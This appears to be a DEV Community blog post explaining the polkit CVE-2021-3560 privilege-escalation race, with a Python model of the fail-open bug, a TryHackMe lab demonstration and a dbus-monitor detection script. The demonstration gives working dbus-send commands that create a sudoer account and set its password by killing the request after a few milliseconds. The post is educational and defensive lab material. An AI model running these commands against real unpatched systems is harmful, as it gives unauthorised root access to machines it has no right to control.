DEV Community

Cinnamon1212

Polkit CVE-2021-3560

Background

Polkit (also known as PolicyKit) is an essential component in Unix-like OSs for controlling system-wide privileges. As you can imagine, exploiting a flaw in it can lead to some nasty privilege escalation. Several mainstream OSs were vulnerable to this (such as Ubuntu 20.04 and Red Hat Enterprise Linux 8), making this a very impactful exploit.

Understanding how and why this works

The original report can be found here.

Polkit is used to allocate privileges for users and processes. This exploit takes advantage of our ability to kill a dbus-send command before the dbus daemon is able to pass Polkit the correct user ID. Polkit then hits an error, and instead of denying the request it carries on with an ID of 0 (all privileges, i.e. root).
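The mechanism above is a textbook instance of a fail-open error path: an identity lookup fails, the failure is not acted on, and a default value that happens to mean "privileged" is used instead. The following is an added illustration of that bug class in miniature, written for this page; it is not polkit's code, and every name in it (`Peer`, `lookup_peer_uid`, `PeerGoneError`) is hypothetical. It shows the vulnerable shape beside the fail-closed one.

```python
from dataclasses import dataclass
from typing import Tuple

# Constructed model of the bug class described in the post: a credential lookup
# that can fail, and two authorization routines that react to that failure
# differently. This is NOT polkit's code; names and types are hypothetical.


class PeerGoneError(Exception):
    """Raised when the peer disconnected before its identity could be read."""


@dataclass
class Peer:
    connected: bool
    uid: int


def lookup_peer_uid(peer: Peer) -> int:
    """Stand-in for asking the bus daemon which UID owns a connection.

    The real query fails once the requesting process has exited, which is
    exactly the window that killing the client after a few milliseconds opens.
    """
    if not peer.connected:
        raise PeerGoneError("connection owner no longer present on the bus")
    return peer.uid


def is_authorized_vulnerable(peer: Peer) -> bool:
    """Defaults uid to 0 and swallows the lookup error, so an unknown caller
    ends up being treated as root."""
    uid = 0
    try:
        uid = lookup_peer_uid(peer)
    except PeerGoneError:
        pass  # error ignored; uid is still the privileged default
    return uid == 0


def is_authorized_hardened(peer: Peer) -> bool:
    """Fails closed: if the caller's identity cannot be established, deny."""
    try:
        uid = lookup_peer_uid(peer)
    except PeerGoneError:
        return False
    return uid == 0


def decide(connected: bool, uid: int) -> Tuple[bool, bool]:
    """Return (vulnerable_decision, hardened_decision) for one peer."""
    peer = Peer(connected=connected, uid=uid)
    return is_authorized_vulnerable(peer), is_authorized_hardened(peer)


if __name__ == "__main__":
    cases = [("root caller", True, 0),
             ("uid 1000 caller", True, 1000),
             ("caller vanished mid-request", False, 1000)]
    for label, connected, uid in cases:
        vuln, hard = decide(connected, uid)
        print(f"{label:30} vulnerable={vuln!s:5} hardened={hard}")
```

The only line that matters is the default. An identity check must never fall through to a value that grants access; when the lookup cannot answer, the answer is "deny".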

Demonstration

I'll be using the polkit box from TryHackMe to demonstrate this. We'll follow the tutorial's process. Our first command is:

```
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1
```

It's pretty long, so let's dissect it. The command is run and timed using "time". Remember we need the timing in order to work out when to kill the dbus-send command. Our dbus-send command asks AccountsService to create a user called attacker (and prints the reply back to us). Normally this is something you'd do through a GUI, where you'd then be prompted for a password.
That takes us to our next command:

```
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!
```

To finish setting up our new account, we need to provide a password. SetPassword takes a SHA-512 crypt hash as input and uses that as the password. In plain text, the password is "Expl01ted".
Finally, we use the delay we measured earlier to kill the command before dbus-daemon is able to hand Polkit our ID.
We're left with a new account called attacker with the password Expl01ted, which is automatically added as a sudoer. We can su into this account and then sudo su to root.
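From the defender's side, the tell-tale of this technique is a privileged method call whose sender leaves the bus before the service has replied. The script below is an added example, not part of the original post, that looks for exactly that condition in `dbus-monitor --system` output: it pairs each call to a watched service with its reply (replies are addressed to the caller's unique name and echo the caller's serial) and flags any call still unanswered when a `NameOwnerChanged` signal reports the caller's name being released. The sample lines are constructed in dbus-monitor's text format and are not a real capture.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample in the style of `dbus-monitor --system` output (not a real
# capture): one CreateUser call whose sender leaves the bus before any reply,
# and one ordinary call that is answered before its sender disconnects.
SAMPLE_MONITOR_OUTPUT = """\
method call time=1623000000.000100 sender=:1.98 -> destination=org.freedesktop.Accounts serial=2 path=/org/freedesktop/Accounts; interface=org.freedesktop.Accounts; member=CreateUser
   string "attacker"
   string "Pentester Account"
   int32 1
signal time=1623000000.004900 sender=org.freedesktop.DBus -> destination=(null destination) serial=120 path=/org/freedesktop/DBus; interface=org.freedesktop.DBus; member=NameOwnerChanged
   string ":1.98"
   string ":1.98"
   string ""
method call time=1623000010.000000 sender=:1.99 -> destination=org.freedesktop.Accounts serial=2 path=/org/freedesktop/Accounts; interface=org.freedesktop.Accounts; member=ListCachedUsers
method return time=1623000010.001000 sender=:1.3 -> destination=:1.99 serial=300 reply_serial=2
signal time=1623000010.002000 sender=org.freedesktop.DBus -> destination=(null destination) serial=121 path=/org/freedesktop/DBus; interface=org.freedesktop.DBus; member=NameOwnerChanged
   string ":1.99"
   string ":1.99"
   string ""
"""

CALL_RE = re.compile(
    r"^method call time=(?P<t>[\d.]+) sender=(?P<sender>\S+) -> "
    r"destination=(?P<dest>\S+) serial=(?P<serial>\d+) path=\S+; "
    r"interface=\S+; member=(?P<member>\S+)$")
REPLY_RE = re.compile(
    r"^(?:method return|error) time=[\d.]+ sender=\S+ -> "
    r"destination=(?P<dest>\S+) .*reply_serial=(?P<rs>\d+)$")
OWNER_CHANGED_RE = re.compile(
    r"^signal time=(?P<t>[\d.]+) sender=org\.freedesktop\.DBus -> "
    r"destination=\(null destination\) serial=\d+ path=/org/freedesktop/DBus; "
    r"interface=org\.freedesktop\.DBus; member=NameOwnerChanged$")
STRING_ARG_RE = re.compile(r'^string "(.*)"$')


@dataclass
class PendingCall:
    time: float
    sender: str
    dest: str
    serial: int
    member: str


def split_records(text: str) -> List[Tuple[str, List[str]]]:
    """Group dbus-monitor output into (header line, indented argument lines)."""
    records: List[Tuple[str, List[str]]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            if records:
                records[-1][1].append(line.strip())
        else:
            records.append((line, []))
    return records


def find_vanished_callers(monitor_text: str,
                          watched=("org.freedesktop.Accounts",)) -> List[dict]:
    """Flag calls to a watched service whose sender left the bus unanswered.

    A legitimate client that crashed mid-call looks identical, so treat hits as
    triage leads to correlate with account changes, not as proof of abuse.
    """
    pending: Dict[Tuple[str, int], PendingCall] = {}
    findings: List[dict] = []
    for header, args in split_records(monitor_text):
        m = CALL_RE.match(header)
        if m:
            if m["dest"] in watched:
                call = PendingCall(float(m["t"]), m["sender"], m["dest"],
                                   int(m["serial"]), m["member"])
                pending[(call.sender, call.serial)] = call
            continue
        m = REPLY_RE.match(header)
        if m:
            # A reply or error closes the call it answers.
            pending.pop((m["dest"], int(m["rs"])), None)
            continue
        m = OWNER_CHANGED_RE.match(header)
        if m and len(args) == 3:
            parsed = [STRING_ARG_RE.match(a) for a in args]
            if not all(parsed):
                continue
            name, _old_owner, new_owner = (p.group(1) for p in parsed)
            if new_owner:  # the name changed hands rather than disappearing
                continue
            for key, call in list(pending.items()):
                if call.sender == name:
                    findings.append({
                        "member": call.member,
                        "destination": call.dest,
                        "sender": call.sender,
                        "lifetime_ms": (float(m["t"]) - call.time) * 1000.0,
                    })
                    del pending[key]
    return findings


if __name__ == "__main__":
    for f in find_vanished_callers(SAMPLE_MONITOR_OUTPUT):
        print(f"{f['destination']}.{f['member']} from {f['sender']}: sender "
              f"disconnected after {f['lifetime_ms']:.1f} ms with no reply")
```

On a live system you would feed this the output of `dbus-monitor --system` and widen `watched` to whatever privileged services you care about. A hit on CreateUser or SetPassword is worth correlating with a fresh entry in /etc/passwd and group membership changes; a hit on a harmless read-only method is most likely just a client that exited early.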

How does this look in practice?

Honestly? It looks simpler than you'd expect. Other than the timing of the command, this is a low-complexity attack, since there are copy-and-paste dbus commands available for it. Even without those, a basic understanding of the dbus utilities is enough to exploit this.
